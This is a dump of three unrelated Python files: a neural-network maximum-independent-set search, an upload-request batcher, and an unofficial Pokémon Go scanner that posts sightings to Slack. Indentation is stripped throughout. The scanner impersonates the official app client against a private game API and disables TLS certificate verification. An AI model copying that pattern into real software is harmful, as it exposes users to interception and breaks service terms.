sys.path.append( '%s/kernel' % os.path.dirname(os.path.realpath(__file__)) )
import signal
#让 python 忽略 SIGPIPE 信号,并且不抛出异常
signal.signal(signal.SIGPIPE,signal.SIG_DFL)
import time
import scipy.io as sio
import numpy as np
import scipy.sparse as sp
import queue
import multiprocessing as mp
from multiprocessing import Manager, Value, Lock
from copy import deepcopy
# import the libary for graph reduction and local search
from reduce_lib import reducelib
from utils import *
# test data path
data_path = "./data"
val_mat_names = os.listdir(data_path)
# no printf
# f=open("/Benz code/NPHard/result.txt","w+")
# sys.stdout=f
f=open("/Benz code/NPHard/result.txt","a")
sys.stdout = f
sys.stderr = f # redirect std err, if necessary
# Define model evaluation function
def evaluate(sess, model, features, support, placeholders):
t_test = time.time()
feed_dict_val = construct_feed_dict4pred(features, support, placeholders)
outs_val = sess.run([model.outputs_softmax], feed_dict=feed_dict_val)
return (time.time() - t_test), outs_val[0]
def findNodeEdges(adj):
nn = adj.shape[0]
edges = []
for i in range(nn):
edges.append(adj.indices[adj.indptr[i]:adj.indptr[i+1]])
return edges
def isis_v2(edges, nIS_vec_local, cn):
return np.sum(nIS_vec_local[edges[cn]] == 1) > 0
def isis(edges, nIS_vec_local):
tmp = (nIS_vec_local==1)
return np.sum(tmp[edges[0]]*tmp[edges[1]]) > 0
def add_rnd_q(cns, nIS_vec_local, pnum, lock):
global adj_0
nIS_vec_local[cns] = 1
tmp = sp.find(adj_0[cns, :] == 1)
nIS_vec_local[tmp[1]] = 0
remain_vec_tmp = (nIS_vec_local == -1)
adj = adj_0
adj = adj[remain_vec_tmp, :]
adj = adj[:, remain_vec_tmp]
if reduce_graph(adj, nIS_vec_local, pnum, lock):
return True
return False
def fake_reduce_graph(adj):
reduced_node = -np.ones(adj.shape[0])
reduced_adj = adj
mapping = np.arange(adj.shape[0])
reverse_mapping = np.arange(adj.shape[0])
crt_is_size = 0
return reduced_node, reduced_adj, mapping, reverse_mapping, crt_is_size
def fake_local_search(adj, nIS_vec):
return nIS_vec.astype(int)
def reduce_graph(adj, nIS_vec_local, pnum, lock):
global best_IS_num
global best_IS_vec
global bsf_q
global adj_0
global q_ct
global id
global out_id
global res_ct
remain_vec = (nIS_vec_local == -1)
# reduce graph
reduced_node, reduced_adj, mapping, reverse_mapping, crt_is_size = api.reduce_graph(adj)
#reduced_node, reduced_adj, mapping, reverse_mapping, crt_is_size = fake_reduce_graph(adj)
nIS_vec_sub = reduced_node.copy()
nIS_vec_sub_tmp = reduced_node.copy()
nIS_vec_sub[nIS_vec_sub_tmp == 0] = 1
nIS_vec_sub[nIS_vec_sub_tmp == 1] = 0
reduced_nn = reduced_adj.shape[0]
# update MIS after reduction
tmp = sp.find(adj[nIS_vec_sub == 1, :] == 1)
nIS_vec_sub[tmp[1]] = 0
nIS_vec_local[remain_vec] = nIS_vec_sub
nIS_vec_local[nIS_vec_local == 2] = -1
#sys.stdout = open('/Benz code/NPHard/result.txt')
# if the whole graph is reduced, we find a candidate
if reduced_nn == 0:
remain_vec_tmp = (nIS_vec_local == -1)
if np.sum(remain_vec_tmp) == 0:
# get a solution
with lock:
res_ct.value += 1
local_res_ct = res_ct.value
nIS_vec_local = api.local_search(adj_0, nIS_vec_local)
#nIS_vec_local = fake_local_search(adj_0, nIS_vec_local)
with lock:
if np.sum(nIS_vec_local) > best_IS_num.value:
best_IS_num.value = np.sum(nIS_vec_local)
best_IS_vec = deepcopy(nIS_vec_local)
sio.savemat('./res_%04d/%s' % (
time_limit, val_mat_names[id]), {'er_graph': adj_0, 'nIS_vec': best_IS_vec})
print("PID: %02d" % pnum, "ID: %03d" % id, "QItem: %03d" % q_ct.value, "Res#: %03d" % local_res_ct,
"Current: %d" % (np.sum(nIS_vec_local)), "Best: %d" % best_IS_num.value, "Reduction")
return True
adj = adj_0
adj = adj[remain_vec_tmp, :]
adj = adj[:, remain_vec_tmp]
with lock:
bsf_q.append([adj, nIS_vec_local.copy(), remain_vec.copy(), reduced_adj, reverse_mapping.copy()])
else:
with lock:
bsf_q.append([adj, nIS_vec_local.copy(), remain_vec.copy(), reduced_adj, reverse_mapping.copy()])
return False
def MPSearch(pnum, lock):
import tensorflow as tf
from models import GCN_DEEP_DIVER
global best_IS_num #
global bsf_q #
global q_ct #
global res_ct #
global best_IS_vec #
global start_time
global adj_0
global opt_num
global edges_0
global nn
global features_all
global N_bd
# Settings
flags = tf.app.flags
FLAGS = flags.FLAGS
flags.DEFINE_string('model', 'gcn_cheby', 'Model string.') # 'gcn', 'gcn_cheby', 'dense'
flags.DEFINE_float('learning_rate', 0.001, 'Initial learning rate.')
flags.DEFINE_integer('epochs', 201, 'Number of epochs to train.')
flags.DEFINE_integer('hidden1', 32, 'Number of units in hidden layer 1.')
flags.DEFINE_integer('diver_num', 32, 'Number of outputs.')
flags.DEFINE_float('dropout', 0, 'Dropout rate (1 - keep probaNUmbility).')
flags.DEFINE_float('weight_decay', 5e-4, 'Weight for L2 loss on embedding matrix.')
flags.DEFINE_integer('early_stopping', 1000, 'Tolerance for early stopping (# of epochs).')
flags.DEFINE_integer('max_degree', 1, 'Maximum Chebyshev polynomial degree.')
flags.DEFINE_integer('num_layer', 20, 'number of layers.')
# Some preprocessing
num_supports = 1 + FLAGS.max_degree
model_func = GCN_DEEP_DIVER
# Define placeholders
placeholders = {
'support': [tf.sparse_placeholder(tf.float32) for _ in range(num_supports)],
'features': tf.sparse_placeholder(tf.float32, shape=(None, N_bd)), # featureless: #points
'labels': tf.placeholder(tf.float32, shape=(None, 2)), # 0: not linked, 1:linked
'labels_mask': tf.placeholder(tf.int32),
'dropout': tf.placeholder_with_default(0., shape=()),
'num_features_nonzero': tf.placeholder(tf.int32) # helper variable for sparse dropout
}
# Create model
model = model_func(placeholders, input_dim=N_bd, logging=True)
# os.system('nvidia-smi -q -d Memory |grep -A4 GPU|grep Free >tmp')
# os.environ['CUDA_VISIBLE_DEVICES']=str(np.argmax([int(x.split()[2]) for x in open('tmp','r').readlines()]))
# os.system('rm tmp')
#os.environ['CUDA_VISIBLE_DEVICES'] = str(0)
# Initialize session
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
# sess = tf.Session()
# Init variables
saver = tf.train.Saver(max_to_keep=1000)
sess.run(tf.global_variables_initializer())
ckpt = tf.train.get_checkpoint_state("./model")
print('%02d loaded' % pnum + ckpt.model_checkpoint_path)
saver.restore(sess, ckpt.model_checkpoint_path)
noout = FLAGS.diver_num # number of outputs
while time.time()-start_time < time_limit:
# if best_IS_num.value == opt_num:
# break
if len(bsf_q) == 0:
if reduce_graph(adj_0, -np.ones(nn), pnum, lock):
break
with lock:
if len(bsf_q) == 0:
continue
q_item = bsf_q.pop(np.random.randint(0,len(bsf_q)))
q_ct.value += 1
adj = q_item[0]
remain_vec = deepcopy(q_item[2])
reduced_adj = q_item[3]
reverse_mapping = deepcopy(q_item[4])
remain_nn = adj.shape[0]
reduced_nn = reduced_adj.shape[0]
if reduced_nn != 0:
# GCN
t1 = features_all[0][0:reduced_nn*N_bd,:]
t2 = features_all[1][0:reduced_nn*N_bd]
t3 = (reduced_nn, N_bd)
features = (t1, t2, t3)
support = simple_polynomials(reduced_adj, FLAGS.max_degree)
_, z_out = evaluate(sess, model, features, support, placeholders)
out_id = np.random.randint(noout)
# if best_IS_num.value == opt_num:
# break
nIS_vec = deepcopy(q_item[1])
nIS_Prob_sub_t = z_out[:, 2 * out_id + 1]
nIS_Prob_sub = np.zeros(remain_nn)
nIS_Prob_sub[reverse_mapping] = nIS_Prob_sub_t
nIS_Prob = np.zeros(nn)
nIS_Prob[remain_vec] = nIS_Prob_sub
# chosen nodes
cns_sorted = np.argsort(1 - nIS_Prob)
# tt = time.time()
nIS_vec_tmp = deepcopy(nIS_vec)
for cid in range(nn):
cn = cns_sorted[cid]
if isis_v2(edges_0, nIS_vec_tmp, cn):
break
nIS_vec_tmp[cn] = 1
# check graph
if np.random.random_sample() > 0.7:
add_rnd_q(cns_sorted[:(cid + 1)], deepcopy(nIS_vec), pnum, lock)
# print("time=", "{:.5f}".format((time.time() - tt)))
cns = cns_sorted[:cid]
nIS_vec[cns] = 1
tmp = sp.find(adj_0[cns, :] == 1)
nIS_vec[tmp[1]] = 0
remain_vec_tmp = (nIS_vec == -1)
if np.sum(remain_vec_tmp) == 0:
# get a solution
with lock:
res_ct.value += 1
local_res_ct = res_ct.value
nIS_vec = api.local_search(adj_0, nIS_vec)
#nIS_vec = fake_local_search(adj_0, nIS_vec)
with lock:
if np.sum(nIS_vec) > best_IS_num.value:
best_IS_num.value = np.sum(nIS_vec)
best_IS_vec = deepcopy(nIS_vec)
sio.savemat('./res_%04d/%s' % (
time_limit, val_mat_names[id]), {'er_graph': adj_0, 'nIS_vec': best_IS_vec})
print("PID: %02d" % pnum, "ID: %03d" % id, "QItem: %03d" % q_ct.value, "Res#: %03d" % local_res_ct,
"Current: %d" % (np.sum(nIS_vec)), "Best: %d" % best_IS_num.value, "Network")
continue
adj = adj_0
adj = adj[remain_vec_tmp, :]
adj = adj[:, remain_vec_tmp]
if reduce_graph(adj, nIS_vec, pnum, lock):
continue
else:
nIS_vec = deepcopy(q_item[1])
if reduce_graph(adj, nIS_vec, pnum, lock):
continue
time_limit = 60000000000 # time limit for searching
if not os.path.isdir("./res_%04d"%time_limit):
os.makedirs("./res_%04d"%time_limit)
# for graph reduction and local search
api = reducelib()
for id in range(len(val_mat_names)):
manager = Manager()
bsf_q = manager.list()
q_ct = Value('i', 0)
res_ct = Value('i', 0)
best_IS_num = Value('i', -1)
best_IS_vec = []
lock = Lock()
mat_contents = sio.loadmat(data_path + '/' + val_mat_names[id])
adj_0 = mat_contents['adj']
# yy = mat_contents['indset_label']
# opt_num = np.sum(yy[:, 0])
# edges_0 = sp.find(adj_0) # for isis version 1
edges_0 = findNodeEdges(adj_0)
nn = adj_0.shape[0]
N_bd = 32
# process features and save them in advance
features_all = np.ones([nn, N_bd])
features_all = sp.lil_matrix(features_all)
features_all = preprocess_features(features_all)
start_time = time.time()
processes = [mp.Process(target=MPSearch, args=(pnum, lock)) for pnum in range(16)]
# Run processes
for p in processes:
p.start()
# Exit the completed processes
for p in processes:
p.join()
print(time.time() - start_time)
# sio.savemat('result_IS4SAT_deep_ld32_c32_l20_cheb1_diver32_res32/res_tbf_mp_e_satlib_%04d/%s' % (time_limit, val_mat_names[id]),
# {'er_graph': adj_0, 'nIS_vec': best_IS_vec})
|
step_prepare.py
|
"""Batching file prepare requests to our API."""
import queue
import threading
import time
from typing import Any, Callable, NamedTuple, Sequence, Union
# Request for a file to be prepared.
class RequestPrepare(NamedTuple):
prepare_fn: Callable[..., Any]
on_prepare: Callable[..., Any]
response_queue: "queue.Queue[ResponsePrepare]"
RequestFinish = NamedTuple("RequestFinish", ())
class ResponsePrepare(NamedTuple):
upload_url: str
upload_headers: Sequence[str]
birth_artifact_id: str
Event = Union[RequestPrepare, RequestFinish, ResponsePrepare]
class StepPrepare:
"""A thread that batches requests to our file prepare API.
Any number of threads may call prepare_async() in parallel. The PrepareBatcher thread
will batch requests up and send them all to the backend at once.
"""
def __init__(self, api, batch_time, inter_event_time, max_batch_size):
self._api = api
self._inter_event_time = inter_event_time
self._batch_time = batch_time
self._max_batch_size = max_batch_size
self._request_queue = queue.Queue()
self._thread = threading.Thread(target=self._thread_body)
self._thread.daemon = True
def _thread_body(self):
while True:
request = self._request_queue.get()
if isinstance(request, RequestFinish):
break
finish, batch = self._gather_batch(request)
prepare_response = self._prepare_batch(batch)
# send responses
for prepare_request in batch:
name = prepare_request.prepare_fn()["name"]
response_file = prepare_response[name]
upload_url = response_file["uploadUrl"]
upload_headers = response_file["uploadHeaders"]
birth_artifact_id = response_file["artifact"]["id"]
if prepare_request.on_prepare:
prepare_request.on_prepare(
upload_url, upload_headers, birth_artifact_id
)
prepare_request.response_queue.put(
ResponsePrepare(upload_url, upload_headers, birth_artifact_id)
)
if finish:
break
def _gather_batch(self, first_request):
batch_start_time = time.time()
batch = [first_request]
while True:
try:
request = self._request_queue.get(
block=True, timeout=self._inter_event_time
)
if isinstance(request, RequestFinish):
return True, batch
batch.append(request)
remaining_time = self._batch_time - (time.time() - batch_start_time)
if remaining_time < 0 or len(batch) >= self._max_batch_size:
break
except queue.Empty:
break
return False, batch
def _prepare_batch(self, batch):
"""Execute the prepareFiles API call.
Arguments:
batch: List of RequestPrepare objects
Returns:
dict of (save_name: ResponseFile) pairs where ResponseFile is a dict with
an uploadUrl key. The value of the uploadUrl key is None if the file
already exists, or a url string if the file should be uploaded.
"""
file_specs = []
for prepare_request in batch:
file_spec = prepare_request.prepare_fn()
file_specs.append(file_spec)
return self._api.create_artifact_files(file_specs)
def prepare_async(self, prepare_fn, on_prepare=None):
"""Request the backend to prepare a file for upload.
Returns:
response_queue: a queue containing the prepare result. The prepare result is
either a file upload url, or None if the file doesn't need to be uploaded.
"""
response_queue = queue.Queue()
self._request_queue.put(RequestPrepare(prepare_fn, on_prepare, response_queue))
return response_queue
def prepare(self, prepare_fn):
return self.prepare_async(prepare_fn).get()
def start(self):
self._thread.start()
def finish(self):
self._request_queue.put(RequestFinish())
def is_alive(self):
return self._thread.is_alive()
def shutdown(self):
self.finish()
self._thread.join()
|
pokeslack.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import flask
from flask import Flask, render_template
from flask_googlemaps import GoogleMaps
from flask_googlemaps import Map
from flask_googlemaps import icons
import os
import codecs
import re
import sys
import struct
import json
import requests
import argparse
import getpass
import threading
import werkzeug.serving
import pokemon_pb2
import time
import httplib
import urllib
from google.protobuf.internal import encoder
from google.protobuf.message import DecodeError
from s2sphere import *
from datetime import datetime, timedelta
from geopy.geocoders import GoogleV3
from gpsoauth import perform_master_login, perform_oauth
from geopy.exc import GeocoderTimedOut, GeocoderServiceError
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.adapters import ConnectionError
from requests.models import InvalidURL
from transform import *
from math import radians, cos, sin, asin, sqrt
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
API_URL = 'https://pgorelease.nianticlabs.com/plfe/rpc'
LOGIN_URL = \
'https://sso.pokemon.com/sso/login?service=https://sso.pokemon.com/sso/oauth2.0/callbackAuthorize'
LOGIN_OAUTH = 'https://sso.pokemon.com/sso/oauth2.0/accessToken'
APP = 'com.nianticlabs.pokemongo'
with open('credentials.json') as file:
credentials = json.load(file)
PTC_CLIENT_SECRET = credentials.get('ptc_client_secret', None)
ANDROID_ID = credentials.get('android_id', None)
SERVICE = credentials.get('service', None)
CLIENT_SIG = credentials.get('client_sig', None)
GOOGLEMAPS_KEY = credentials.get('gmaps_key', None)
SESSION = requests.session()
SESSION.headers.update({'User-Agent': 'Niantic App'})
SESSION.verify = False
global_password = None
global_token = None
access_token = None
DEBUG = True
VERBOSE_DEBUG = False # if you want to write raw request/response to the console
COORDS_LATITUDE = 0
COORDS_LONGITUDE = 0
COORDS_ALTITUDE = 0
FLOAT_LAT = 0
FLOAT_LONG = 0
NEXT_LAT = 0
NEXT_LONG = 0
auto_refresh = 0
default_step = 0.001
api_endpoint = None
pokemons = {}
gyms = {}
pokestops = {}
numbertoteam = { # At least I'm pretty sure that's it. I could be wrong and then I'd be displaying the wrong owner team of gyms.
0: 'Gym',
1: 'Mystic',
2: 'Valor',
3: 'Instinct',
}
origin_lat, origin_lon = None, None
is_ampm_clock = False
spotted_pokemon = {}
max_idle_time = timedelta(seconds=300)
api_last_response = datetime.now() - 2 * max_idle_time
wait_to_reconnect = 60
# stuff for in-background search thread
search_thread = None
class memoized(object):
"""Decorator that caches a function's return value each time it is called.
If called later with the same arguments, the cached value is returned, and
not re-evaluated.
"""
def __init__(self, func):
self.func = func
self.cache = {}
def __call__(self, *args):
try:
return self.cache[args]
except KeyError:
value = self.func(*args)
self.cache[args] = value
return value
except TypeError:
# uncachable -- for instance, passing a list as an argument.
# Better to not cache than to blow up entirely.
return self.func(*args)
def __repr__(self):
"""Return the function's docstring."""
return self.func.__doc__
def __get__(self, obj, objtype):
"""Support instance methods."""
fn = functools.partial(self.__call__, obj)
fn.reset = self._reset
return fn
def _reset(self):
self.cache = {}
def parse_unicode(bytestring):
decoded_string = bytestring.decode(sys.getfilesystemencoding())
return decoded_string
def debug(message):
if DEBUG:
print '[-] {}'.format(message)
def time_left(ms):
s = ms / 1000
(m, s) = divmod(s, 60)
(h, m) = divmod(m, 60)
return (h, m, s)
def lonlat_to_meters(lat1, lon1, lat2, lon2):
"""
Calculate the great circle distance between two points
on the earth (specified in decimal degrees)
"""
# convert decimal degrees to radians
lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])
# haversine formula
dlon = lon2 - lon1
dlat = lat2 - lat1
a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2
c = 2 * asin(sqrt(a))
# earth radius in meters: 6378100
m = 6378100 * c
return m
def bearing_degrees(lat1, lon1, lat2, lon2):
"""
Convert location in bearing degrees to be able to give a direction of where the Pokemon is located.
:param lat1: user location latitude
:param lon1: user location longitude
:param lat2: pokemon location latitude
:param lon2: pokemon location longitude
:return: bearing degrees
"""
# convert decimal degrees to radians
lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])
# calculate the angle
dlon = lon2 - lon1
dlat = lat2 - lat1
x = math.sin(dlon) * math.cos(lat2)
y = math.cos(lat1) * math.sin(lat2) - (math.sin(lat1) * math.cos(lat2) * math.cos(dlon))
initial_bearing = math.atan2(x, y)
initial_bearing = math.degrees(initial_bearing)
bearing = (initial_bearing + 360) % 360
bearing = int(bearing)
return bearing
def bearing_degrees_to_compass_direction(bearing):
"""
Converts bearing degrees in easy to read North-East-West-South direction
:param bearing: bearing in degrees
:return: North, Northeast, East, etc
"""
if bearing >= 0 and bearing < 23:
direction = 'north'
elif bearing >= 23 and bearing < 68:
direction = 'northeast'
elif bearing >= 68 and bearing < 113:
direction = 'east'
elif bearing >= 113 and bearing < 158:
direction = 'southeast'
elif bearing >= 158 and bearing < 203:
direction = 'south'
elif bearing >= 203 and bearing < 248:
direction = 'southwest'
elif bearing >= 248 and bearing < 293:
direction = 'west'
elif bearing >= 293 and bearing < 338:
direction = 'northwest'
elif bearing >= 338 and bearing <= 360:
direction = 'north'
return direction
def encode(cellid):
output = []
encoder._VarintEncoder()(output.append, cellid)
return ''.join(output)
def getNeighbors():
origin = CellId.from_lat_lng(LatLng.from_degrees(FLOAT_LAT,
FLOAT_LONG)).parent(15)
walk = [origin.id()]
# 10 before and 10 after
next = origin.next()
prev = origin.prev()
for i in range(10):
walk.append(prev.id())
walk.append(next.id())
next = next.next()
prev = prev.prev()
return walk
def f2i(float):
return struct.unpack('<Q', struct.pack('<d', float))[0]
def f2h(float):
return hex(struct.unpack('<Q', struct.pack('<d', float))[0])
def h2f(hex):
return struct.unpack('<d', struct.pack('<Q', int(hex, 16)))[0]
def retrying_set_location(location_name):
"""
Continue trying to get co-ords from Google Location until we have them
:param location_name: string to pass to Location API
:return: None
"""
while True:
try:
set_location(location_name)
return
except (GeocoderTimedOut, GeocoderServiceError), e:
debug(
'retrying_set_location: geocoder exception ({}), retrying'.format(
str(e)))
time.sleep(1.25)
def set_location(location_name):
geolocator = GoogleV3()
prog = re.compile('^(\-?\d+(\.\d+)?),\s*(\-?\d+(\.\d+)?)$')
global origin_lat
global origin_lon
if prog.match(location_name):
local_lat, local_lng = [float(x) for x in location_name.split(",")]
alt = 0
origin_lat, origin_lon = local_lat, local_lng
else:
loc = geolocator.geocode(location_name)
origin_lat, origin_lon = local_lat, local_lng = loc.latitude, loc.longitude
alt = loc.altitude
print '[!] Your given location: {}'.format(loc.address.encode('utf-8'))
print('[!] lat/long/alt: {} {} {}'.format(local_lat, local_lng, alt))
set_location_coords(local_lat, local_lng, alt)
def set_location_coords(lat, long, alt):
global COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE
global FLOAT_LAT, FLOAT_LONG
FLOAT_LAT = lat
FLOAT_LONG = long
COORDS_LATITUDE = f2i(lat) # 0x4042bd7c00000000 # f2i(lat)
COORDS_LONGITUDE = f2i(long) # 0xc05e8aae40000000 #f2i(long)
COORDS_ALTITUDE = f2i(alt)
def get_location_coords():
return (COORDS_LATITUDE, COORDS_LONGITUDE, COORDS_ALTITUDE)
def retrying_api_req(service, api_endpoint, access_token, *args, **kwargs):
while True:
try:
response = api_req(service, api_endpoint, access_token, *args,
**kwargs)
if response:
return response
debug('retrying_api_req: api_req returned None, retrying')
except (InvalidURL, ConnectionError, DecodeError), e:
debug('retrying_api_req: request error ({}), retrying'.format(
str(e)))
time.sleep(1)
def api_req(service, api_endpoint, access_token, *args, **kwargs):
p_req = pokemon_pb2.RequestEnvelop()
p_req.rpc_id = 1469378659230941192
p_req.unknown1 = 2
(p_req.latitude, p_req.longitude, p_req.altitude) = \
get_location_coords()
p_req.unknown12 = 989
if 'useauth' not in kwargs or not kwargs['useauth']:
p_req.auth.provider = service
p_req.auth.token.contents = access_token
p_req.auth.token.unknown13 = 14
else:
p_req.unknown11.unknown71 = kwargs['useauth'].unknown71
p_req.unknown11.unknown72 = kwargs['useauth'].unknown72
p_req.unknown11.unknown73 = kwargs['useauth'].unknown73
for arg in args:
p_req.MergeFrom(arg)
protobuf = p_req.SerializeToString()
r = SESSION.post(api_endpoint, data=protobuf, verify=False)
p_ret = pokemon_pb2.ResponseEnvelop()
p_ret.ParseFromString(r.content)
if VERBOSE_DEBUG:
print 'REQUEST:'
print p_req
print 'Response:'
print p_ret
print '''
'''
time.sleep(0.51)
return p_ret
def get_api_endpoint(service, access_token, api=API_URL):
profile_response = None
while not profile_response:
profile_response = retrying_get_profile(service, access_token, api,
None)
if not hasattr(profile_response, 'api_url'):
debug(
'retrying_get_profile: get_profile returned no api_url, retrying')
profile_response = None
continue
if not len(profile_response.api_url):
debug(
'get_api_endpoint: retrying_get_profile returned no-len api_url, retrying')
profile_response = None
return 'https://%s/rpc' % profile_response.api_url
def retrying_get_profile(service, access_token, api, useauth, *reqq):
profile_response = None
while not profile_response:
profile_response = get_profile(service, access_token, api, useauth,
*reqq)
if not hasattr(profile_response, 'payload'):
debug(
'retrying_get_profile: get_profile returned no payload, retrying')
profile_response = None
continue
if not profile_response.payload:
debug(
'retrying_get_profile: get_profile returned no-len payload, retrying')
profile_response = None
return profile_response
def get_profile(service, access_token, api, useauth, *reqq):
req = pokemon_pb2.RequestEnvelop()
req1 = req.requests.add()
req1.type = 2
if len(reqq) >= 1:
req1.MergeFrom(reqq[0])
req2 = req.requests.add()
req2.type = 126
if len(reqq) >= 2:
req2.MergeFrom(reqq[1])
req3 = req.requests.add()
req3.type = 4
if len(reqq) >= 3:
req3.MergeFrom(reqq[2])
req4 = req.requests.add()
req4.type = 129
if len(reqq) >= 4:
req4.MergeFrom(reqq[3])
req5 = req.requests.add()
req5.type = 5
if len(reqq) >= 5:
req5.MergeFrom(reqq[4])
return retrying_api_req(service, api, access_token, req, useauth=useauth)
def login_google(username, password):
print '[!] Google login for: {}'.format(username)
r1 = perform_master_login(username, password, ANDROID_ID)
r2 = perform_oauth(username,
r1.get('Token', ''),
ANDROID_ID,
SERVICE,
APP,
CLIENT_SIG, )
return r2.get('Auth')
def login_ptc(username, password):
print '[!] PTC login for: {}'.format(username)
head = {'User-Agent': 'Niantic App'}
r = SESSION.get(LOGIN_URL, headers=head)
if r is None:
return render_template('nope.html', fullmap=fullmap)
try:
jdata = json.loads(r.content)
except ValueError, e:
debug('login_ptc: could not decode JSON from {}'.format(r.content))
return None
# Maximum password length is 15 (sign in page enforces this limit, API does not)
if len(password) > 15:
print '[!] Trimming password to 15 characters'
password = password[:15]
data = {
'lt': jdata['lt'],
'execution': jdata['execution'],
'_eventId': 'submit',
'username': username,
'password': password,
}
r1 = SESSION.post(LOGIN_URL, data=data, headers=head)
ticket = None
try:
ticket = re.sub('.*ticket=', '', r1.history[0].headers['Location'])
except Exception, e:
if DEBUG:
print r1.json()['errors'][0]
return None
data1 = {
'client_id': 'mobile-app_pokemon-go',
'redirect_uri': 'https://www.nianticlabs.com/pokemongo/error',
'client_secret': PTC_CLIENT_SECRET,
'grant_type': 'refresh_token',
'code': ticket,
}
r2 = SESSION.post(LOGIN_OAUTH, data=data1)
access_token = re.sub('&expires.*', '', r2.content)
access_token = re.sub('.*access_token=', '', access_token)
return access_token
def get_heartbeat(service,
api_endpoint,
access_token,
response, ):
m4 = pokemon_pb2.RequestEnvelop.Requests()
m = pokemon_pb2.RequestEnvelop.MessageSingleInt()
m.f1 = int(time.time() * 1000)
m4.message = m.SerializeToString()
m5 = pokemon_pb2.RequestEnvelop.Requests()
m = pokemon_pb2.RequestEnvelop.MessageSingleString()
m.bytes = '05daf51635c82611d1aac95c0b051d3ec088a930'
m5.message = m.SerializeToString()
walk = sorted(getNeighbors())
m1 = pokemon_pb2.RequestEnvelop.Requests()
m1.type = 106
m = pokemon_pb2.RequestEnvelop.MessageQuad()
m.f1 = ''.join(map(encode, walk))
m.f2 = \
"\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000"
m.lat = COORDS_LATITUDE
m.long = COORDS_LONGITUDE
m1.message = m.SerializeToString()
response = get_profile(service,
access_token,
api_endpoint,
response.unknown7,
m1,
pokemon_pb2.RequestEnvelop.Requests(),
m4,
pokemon_pb2.RequestEnvelop.Requests(),
m5, )
try:
payload = response.payload[0]
except (AttributeError, IndexError):
return
heartbeat = pokemon_pb2.ResponseEnvelop.HeartbeatPayload()
heartbeat.ParseFromString(payload)
return heartbeat
def get_token(service, username, password):
"""
Get token if it's not None
:return:
:rtype:
"""
global global_token
if True: # global_token is None:
if service == 'ptc':
global_token = login_ptc(username, password)
else:
global_token = login_google(username, password)
return global_token
else:
return global_token
def send_to_slack(text, username, icon_emoji, webhook):
values = {'payload': '{"username": "' + username + '", '
'"icon_emoji": "' + icon_emoji + '", '
'"text": "' + text + '"}'
}
str_values = {}
for k, v in values.items():
str_values[k] = unicode(v).encode('utf-8')
data = urllib.urlencode(str_values)
h = httplib.HTTPSConnection('hooks.slack.com')
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
h.request('POST', webhook, data, headers)
r = h.getresponse()
ack = r.read()
#print data
#print ack
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'-a', '--auth_service', type=str.lower, help='Auth Service', default='ptc')
parser.add_argument('-u', '--username', help='Username', required=True)
parser.add_argument('-p', '--password', help='Password', required=False)
parser.add_argument(
'-l', '--location', type=parse_unicode, help='Location', required=True)
parser.add_argument('-st', '--step-limit', help='Steps', required=True)
parser.add_argument('-sw', '--slack-webhook', help='slack webhook urlpath /services/.../../...', required=True)
parser.add_argument('-r', '--range', help='max range of pokemon for notifactions in meters', required=True)
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument(
'-i', '--ignore', help='Comma-separated list of Pokémon names or IDs to ignore')
group.add_argument(
'-o', '--only', help='Comma-separated list of Pokémon names or IDs to search')
parser.add_argument(
"-ar",
"--auto_refresh",
help="Enables an autorefresh that behaves the same as a page reload. " +
"Needs an integer value for the amount of seconds")
parser.add_argument(
'-pi',
'--pokemon-icons',
help='If you have pokemon emojis in Slack, you can give the prefix here, e.g.: \':\' if your emojis are named' +
':pokename:, \':pokemon-:\' if they are named :pokemon-pokename:. :pokeball: is default.',
default=':pokeball:')
parser.add_argument(
'-dp',
'--display-pokestop',
help='Display pokéstop',
action='store_true',
default=False)
parser.add_argument(
'-dg',
'--display-gym',
help='Display Gym',
action='store_true',
default=False)
parser.add_argument(
'-H',
'--host',
help='Set web server listening host',
default='127.0.0.1')
parser.add_argument(
'-P',
'--port',
type=int,
help='Set web server listening port',
default=5000)
parser.add_argument(
"-L",
"--locale",
help="Locale for Pokemon names: default en, check locale folder for more options",
default="en")
parser.add_argument(
"-ol",
"--onlylure",
help='Display only lured pokéstop',
action='store_true')
parser.add_argument(
'-c',
'--china',
help='Coordinates transformer for China',
action='store_true')
parser.add_argument(
"-pm",
"--ampm_clock",
help="Toggles the AM/PM clock for Pokemon timers",
action='store_true',
default=False)
parser.add_argument(
'-d', '--debug', help='Debug Mode', action='store_true')
parser.set_defaults(DEBUG=True)
return parser.parse_args()
class connection:
@memoized
def login(self, args):
global global_password
if not global_password:
if args.password:
global_password = args.password
else:
global_password = getpass.getpass()
access_token = get_token(args.auth_service, args.username, global_password)
if access_token is None:
raise Exception('[-] Wrong username/password')
print '[+] RPC Session Token: {} ...'.format(access_token[:25])
api_endpoint = get_api_endpoint(args.auth_service, access_token)
if api_endpoint is None:
raise Exception('[-] RPC server offline')
print '[+] Received API endpoint: {}'.format(api_endpoint)
profile_response = retrying_get_profile(args.auth_service, access_token,
api_endpoint, None)
if profile_response is None or not profile_response.payload:
raise Exception('Could not get profile')
print '[+] Login successful'
payload = profile_response.payload[0]
profile = pokemon_pb2.ResponseEnvelop.ProfilePayload()
profile.ParseFromString(payload)
print '[+] Username: {}'.format(profile.profile.username)
creation_time = \
datetime.fromtimestamp(int(profile.profile.creation_time)
/ 1000)
print '[+] You started playing Pokemon Go on: {}'.format(
creation_time.strftime('%Y-%m-%d %H:%M:%S'))
for curr in profile.profile.currency:
print '[+] {}: {}'.format(curr.type, curr.amount)
return api_endpoint, access_token, profile_response
def main():
full_path = os.path.realpath(__file__)
(path, filename) = os.path.split(full_path)
args = get_args()
if args.auth_service not in ['ptc', 'google']:
print '[!] Invalid Auth service specified'
return
print('[+] Locale is ' + args.locale)
pokemonsJSON = json.load(
codecs.open(path + '/locales/pokemon.' + args.locale + '.json', "r", 'UTF-8'))
if args.debug:
global DEBUG
DEBUG = True
print '[!] DEBUG mode on'
# only get location for first run
